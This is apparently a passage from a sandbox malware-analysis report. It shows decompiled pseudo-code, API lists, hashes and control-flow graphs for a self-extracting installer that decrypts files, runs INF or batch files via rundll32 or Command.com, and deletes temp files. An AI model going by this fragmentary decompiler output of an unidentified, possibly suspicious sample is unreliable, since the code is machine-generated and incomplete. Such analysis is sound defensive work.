	CHAR* _t155;
	CHAR* _t156;
	void* _t157;
	signed int _t158;

	_t48 =  *0xc8004; // 0x374600bf
	_v8 = _t48 ^ _t158;
	_t108 = __ecx;
	_v1564 = _a4;
	_v1560 = _a8;
	E000C1680( &_v528, 0x104, __ecx);
	if(_v528 != 0x22) {
		_t135 = " ";
		_t53 =  &_v528;
	} else {
		_t135 = "\"";
		_t53 =  &_v527;
	}
	_t111 =  &_v1556;
	_v1556 = _t53;
	_t54 = E000C1A84(_t111, _t135);
	_t156 = _v1556;
	_t151 = _t54;
	if(_t156 == 0) {
		L12:
		_push(_t111);
		E000C1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
		E000C658A( &_v268, 0x104, _t156);
		goto L13;
	} else {
		_t132 = _t156;
		_t148 =  &(_t132[1]);
		do {
			_t105 =  *_t132;
			_t132 =  &(_t132[1]);
		} while (_t105 != 0);
		_t111 = _t132 - _t148;
		if(_t111 < 3) {
			goto L12;
		}
		_t106 = _t156[1];
		if(_t106 != 0x3a || _t156[2] != 0x5c) {
			if( *_t156 != 0x5c || _t106 != 0x5c) {
				goto L12;
			} else {
				goto L11;
			}
		} else {
			L11:
			E000C1680( &_v268, 0x104, _t156);
			L13:
			_t138 = 0x2e;
			_t57 = E000C66C8(_t156, _t138);
			if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
				_t139 = 0x2e;
				_t115 = _t156;
				_t58 = E000C66C8(_t115, _t139);
				if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
					_t156 = LocalAlloc(0x40, 0x400);
					if(_t156 == 0) {
						goto L43;
					}
					_t65 = GetFileAttributesA( &_v268); // executed
					if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
						E000C1680( &_v1552, 0x400, _t108);
					} else {
						_push(_t115);
						_t108 = 0x400;
						E000C1781( &_v1552, 0x400, _t115,  &_v268);
						if(_t151 != 0 &&  *_t151 != 0) {
							E000C16B3( &_v1552, 0x400, " ");
							E000C16B3( &_v1552, 0x400, _t151);
						}
					}
					_t140 = _t156;
					 *_t156 = 0;
					E000C2AAC( &_v1552, _t156, _t156);
					goto L53;
				} else {
					_t108 = "Command.com /c %s";
					_t125 = "Command.com /c %s";
					_t145 = _t125 + 1;
					do {
						_t76 =  *_t125;
						_t125 = _t125 + 1;
					} while (_t76 != 0);
					_t126 = _t125 - _t145;
					_t146 =  &_v268;
					_t157 = _t146 + 1;
					do {
						_t77 =  *_t146;
						_t146 = _t146 + 1;
					} while (_t77 != 0);
					_t140 = _t146 - _t157;
					_t154 = _t126 + 8 + _t146 - _t157;
					_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
					if(_t156 != 0) {
						E000C171E(_t156, _t154, "Command.com /c %s",  &_v268);
						goto L53;
					}
					goto L43;
				}
			} else {
				_t85 = GetFileAttributesA( &_v268);
				if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
					_t140 = 0x525;
					_push(0);
					_push(0x10);
					_push(0);
					_t60 =  &_v268;
					goto L35;
				} else {
					_t140 = "[";
					_v1556 = _t151;
					_t90 = E000C1A84( &_v1556, "[");
					if(_t90 != 0) {
						if( *_t90 != 0) {
							_v1556 = _t90;
						}
						_t140 = "]";
						E000C1A84( &_v1556, "]");
					}
					_t156 = LocalAlloc(0x40, 0x200);
					if(_t156 == 0) {
						L43:
						_t60 = 0;
						_t140 = 0x4b5;
						_push(0);
						_push(0x10);
						_push(0);
						L35:
						_push(_t60);
						E000C44B9(0, _t140);
						_t62 = 0;
						goto L54;
					} else {
						_t155 = _v1556;
						_t92 = _t155;
						if( *_t155 == 0) {
							_t92 = "DefaultInstall";
						}
						 *0xc9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
						 *_v1560 = 1;
						if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xc1140, _t156, 8,  &_v268) == 0) {
							 *0xc9a34 =  *0xc9a34 & 0xfffffffb;
							if( *0xc9a40 != 0) {
                                                                                                                                                                                                        											_t108 = "setupapi.dll";
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t108 = "setupx.dll";
                                                                                                                                                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push( &_v268);
                                                                                                                                                                                                        										_push(_t155);
                                                                                                                                                                                                        										E000C171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *0xc9a34 =  *0xc9a34 | 0x00000004;
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										E000C1680(_t108, 0x104, _t155);
                                                                                                                                                                                                        										_t140 = 0x200;
                                                                                                                                                                                                        										E000C1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L53:
                                                                                                                                                                                                        									_t62 = 1;
                                                                                                                                                                                                        									 *_v1564 = _t156;
                                                                                                                                                                                                        									L54:
                                                                                                                                                                                                        									_pop(_t152);
                                                                                                                                                                                                        									return E000C6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}














































                                                                                                                                                                                                        0x000c1c5d
                                                                                                                                                                                                        0x000c1c61
                                                                                                                                                                                                        0x000c1dd4
                                                                                                                                                                                                        0x000c1dd4
                                                                                                                                                                                                        0x000c1dd6
                                                                                                                                                                                                        0x000c1ddb
                                                                                                                                                                                                        0x000c1ddc
                                                                                                                                                                                                        0x000c1dde
                                                                                                                                                                                                        0x000c1d64
                                                                                                                                                                                                        0x000c1d64
                                                                                                                                                                                                        0x000c1d67
                                                                                                                                                                                                        0x000c1d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c1c67
                                                                                                                                                                                                        0x000c1c67
                                                                                                                                                                                                        0x000c1c6d
                                                                                                                                                                                                        0x000c1c72
                                                                                                                                                                                                        0x000c1c74
                                                                                                                                                                                                        0x000c1c74
                                                                                                                                                                                                        0x000c1c8e
                                                                                                                                                                                                        0x000c1c99
                                                                                                                                                                                                        0x000c1cc0
                                                                                                                                                                                                        0x000c1cf8
                                                                                                                                                                                                        0x000c1d07
                                                                                                                                                                                                        0x000c1d23
                                                                                                                                                                                                        0x000c1d09
                                                                                                                                                                                                        0x000c1d14
                                                                                                                                                                                                        0x000c1d1b
                                                                                                                                                                                                        0x000c1d1b
                                                                                                                                                                                                        0x000c1d2b
                                                                                                                                                                                                        0x000c1d2d
                                                                                                                                                                                                        0x000c1d2d
                                                                                                                                                                                                        0x000c1d38
                                                                                                                                                                                                        0x000c1d39
                                                                                                                                                                                                        0x000c1d46
                                                                                                                                                                                                        0x000c1cc2
                                                                                                                                                                                                        0x000c1cc2
                                                                                                                                                                                                        0x000c1ccc
                                                                                                                                                                                                        0x000c1cce
                                                                                                                                                                                                        0x000c1cce
                                                                                                                                                                                                        0x000c1cdb
                                                                                                                                                                                                        0x000c1ce6
                                                                                                                                                                                                        0x000c1cee
                                                                                                                                                                                                        0x000c1cee
                                                                                                                                                                                                        0x000c1e89
                                                                                                                                                                                                        0x000c1e91
                                                                                                                                                                                                        0x000c1e92
                                                                                                                                                                                                        0x000c1e94
                                                                                                                                                                                                        0x000c1e97
                                                                                                                                                                                                        0x000c1ea4
                                                                                                                                                                                                        0x000c1ea4
                                                                                                                                                                                                        0x000c1c61
                                                                                                                                                                                                        0x000c1c07
                                                                                                                                                                                                        0x000c1bd3
                                                                                                                                                                                                        0x000c1b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 000C1BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 000C1BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 000C1C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 000C1C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,000C1140,00000000,00000008,?), ref: 000C1CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 000C1D1B
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-819679500
                                                                                                                                                                                                        • Opcode ID: 5a0416bbdb17e004765cd4dee860804b1191cfefc1abc3888ed6d114ba11e18f
                                                                                                                                                                                                        • Instruction ID: 32e5294360a020c59515059ee73201d075107f455b5dd55a8288ba26d4251616
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a0416bbdb17e004765cd4dee860804b1191cfefc1abc3888ed6d114ba11e18f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CA13870A002186FEB609B24CC45FEE77A9AB53310F14429CF996E72D3DBB49E85CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 450 c2f1d-c2f3d 451 c2f6c-c2f73 call c5164 450->451 452 c2f3f-c2f46 450->452 461 c2f79-c2f80 call c55a0 451->461 462 c3041 451->462 453 c2f5f-c2f66 call c3a3f 452->453 454 c2f48 call c51e5 452->454 453->451 453->462 459 c2f4d-c2f4f 454->459 459->462 465 c2f55-c2f5d 459->465 461->462 468 c2f86-c2fbe GetSystemDirectoryA call c658a LoadLibraryA 461->468 464 c3043-c3053 call c6ce0 462->464 465->451 465->453 472 c2ff7-c3004 FreeLibrary 468->472 473 c2fc0-c2fd4 GetProcAddress 468->473 475 c3006-c300c 472->475 476 c3017-c3024 SetCurrentDirectoryA 472->476 473->472 474 c2fd6-c2fee DecryptFileA 473->474 474->472 486 c2ff0-c2ff5 474->486 475->476 479 c300e call c621e 475->479 477 c3054-c305a 476->477 478 c3026-c303c call c44b9 call c6285 476->478 482 c305c call c3b26 477->482 483 c3065-c306c 477->483 478->462 490 c3013-c3015 479->490 494 c3061-c3063 482->494 488 c307c-c3089 483->488 489 c306e-c3075 call c256d 483->489 486->472 491 c308b-c3091 488->491 492 c30a1-c30a9 488->492 496 c307a 489->496 490->462 490->476 491->492 497 c3093 call c3ba2 491->497 499 c30ab-c30ad 492->499 500 c30b4-c30b7 492->500 494->462 494->483 496->488 503 c3098-c309a 497->503 499->500 502 c30af call c4169 499->502 500->464 502->500 503->462 505 c309c 503->505 505->492
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E000C2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0xc8a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E000C5164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						return E000C6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E000C55A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t45 = 0x105;
                                                                                                                                                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                        						_t43 = 0x105;
                                                                                                                                                                                                        						_t40 =  &_v272;
                                                                                                                                                                                                        						E000C658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                        							_v276 = _t31;
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								_t45 = _t47;
                                                                                                                                                                                                        								_t40 = _t31;
                                                                                                                                                                                                        								 *0xca288("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                        								_v276();
                                                                                                                                                                                                        								if(_t47 != _t47) {
                                                                                                                                                                                                        									_t40 = 4;
                                                                                                                                                                                                        									asm("int 0x29");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						FreeLibrary(_t36);
                                                                                                                                                                                                        						_t58 =  *0xc8a24 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t58 != 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                                                        								__eflags =  *0xc8a2c - _t44; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									__eflags =  *0xc8d48 & 0x000000c0;
                                                                                                                                                                                                        									if(( *0xc8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                        										_t41 =  *0xc9a40; // 0x3, executed
                                                                                                                                                                                                        										_t26 = E000C256D(_t41); // executed
                                                                                                                                                                                                        										_t44 = _t26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t22 =  *0xc8a24; // 0x0
                                                                                                                                                                                                        									 *0xc9a44 = _t44;
                                                                                                                                                                                                        									__eflags = _t22;
                                                                                                                                                                                                        									if(_t22 != 0) {
                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                        										__eflags =  *0xc8a38;
                                                                                                                                                                                                        										if( *0xc8a38 == 0) {
                                                                                                                                                                                                        											__eflags = _t22;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												E000C4169(__eflags);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t12 = 1;
                                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *0xc9a30 - _t22; // 0x0
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t25 = E000C3BA2(); // executed
                                                                                                                                                                                                        										__eflags = _t25;
                                                                                                                                                                                                        										if(_t25 == 0) {
                                                                                                                                                                                                        											goto L16;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t22 =  *0xc8a24; // 0x0
                                                                                                                                                                                                        										goto L26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t27 = E000C3B26(_t40, _t44);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t43 = 0x4bc;
                                                                                                                                                                                                        							E000C44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                        							 *0xc9124 = E000C6285();
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 =  *0xc9a30 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E000C621E(); // executed
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t49 =  *0xc8a24;
                                                                                                                                                                                                        				if( *0xc8a24 != 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					_t34 = E000C3A3F(_t51);
                                                                                                                                                                                                        					_t52 = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E000C51E5(_t49) == 0) {
                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t51 =  *0xc8a38;
                                                                                                                                                                                                        				if( *0xc8a38 != 0) {
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x000c301c
                                                                                                                                                                                                        0x000c3024
                                                                                                                                                                                                        0x000c3054
                                                                                                                                                                                                        0x000c305a
                                                                                                                                                                                                        0x000c3065
                                                                                                                                                                                                        0x000c3065
                                                                                                                                                                                                        0x000c306c
                                                                                                                                                                                                        0x000c306e
                                                                                                                                                                                                        0x000c3075
                                                                                                                                                                                                        0x000c307a
                                                                                                                                                                                                        0x000c307a
                                                                                                                                                                                                        0x000c307c
                                                                                                                                                                                                        0x000c3081
                                                                                                                                                                                                        0x000c3087
                                                                                                                                                                                                        0x000c3089
                                                                                                                                                                                                        0x000c30a1
                                                                                                                                                                                                        0x000c30a1
                                                                                                                                                                                                        0x000c30a9
                                                                                                                                                                                                        0x000c30ab
                                                                                                                                                                                                        0x000c30ad
                                                                                                                                                                                                        0x000c30af
                                                                                                                                                                                                        0x000c30af
                                                                                                                                                                                                        0x000c30ad
                                                                                                                                                                                                        0x000c30b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c308b
                                                                                                                                                                                                        0x000c308b
                                                                                                                                                                                                        0x000c3091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3093
                                                                                                                                                                                                        0x000c3098
                                                                                                                                                                                                        0x000c309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c309c
                                                                                                                                                                                                        0x000c3089
                                                                                                                                                                                                        0x000c305c
                                                                                                                                                                                                        0x000c3061
                                                                                                                                                                                                        0x000c3063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3063
                                                                                                                                                                                                        0x000c302b
                                                                                                                                                                                                        0x000c3032
                                                                                                                                                                                                        0x000c303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c303c
                                                                                                                                                                                                        0x000c3006
                                                                                                                                                                                                        0x000c300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c300e
                                                                                                                                                                                                        0x000c3015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3015
                                                                                                                                                                                                        0x000c2f80
                                                                                                                                                                                                        0x000c2f3f
                                                                                                                                                                                                        0x000c2f46
                                                                                                                                                                                                        0x000c2f5f
                                                                                                                                                                                                        0x000c2f5f
                                                                                                                                                                                                        0x000c2f64
                                                                                                                                                                                                        0x000c2f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2f66
                                                                                                                                                                                                        0x000c2f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2f55
                                                                                                                                                                                                        0x000c2f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 000C2F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 000C2FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 000C2FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 000C2FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 000C2FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 000C301C
                                                                                                                                                                                                          • Part of subcall function 000C51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000C2F4D,?,00000002,00000000), ref: 000C5201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-3023407756
                                                                                                                                                                                                        • Opcode ID: 23792afaaa3c312cbc27627e076f38e3486ca85419ceed7baf7fb460feba5d18
                                                                                                                                                                                                        • Instruction ID: b65c68b01ddfcaab188eb70e2d0ebf6a07757b8e0b50eef48299cf35a3400f72
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23792afaaa3c312cbc27627e076f38e3486ca85419ceed7baf7fb460feba5d18
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D41C9326106058AFB70AB719C59F9E33E8DB45754F20803DAD41C2593EF78CE80CB96
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 648 c2390-c23b3 649 c23b9-c23bc 648->649 650 c24cb-c24df call c6ce0 648->650 649->650 652 c23c2-c2401 call c1680 call c16b3 FindFirstFileA 649->652 652->650 658 c2407-c241f call c1680 652->658 661 c2479-c24a3 call c16b3 SetFileAttributesA DeleteFileA 658->661 662 c2421-c242f lstrcmpA 658->662 664 c24a9-c24b7 FindNextFileA 661->664 662->664 665 c2431-c2443 lstrcmpA 662->665 664->658 667 c24bd-c24c5 FindClose RemoveDirectoryA 664->667 665->664 668 c2445-c2477 call c16b3 call c658a call c2390 665->668 667->650 668->664
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E000C2390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E000C6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E000C1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E000C16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E000C1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E000C16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
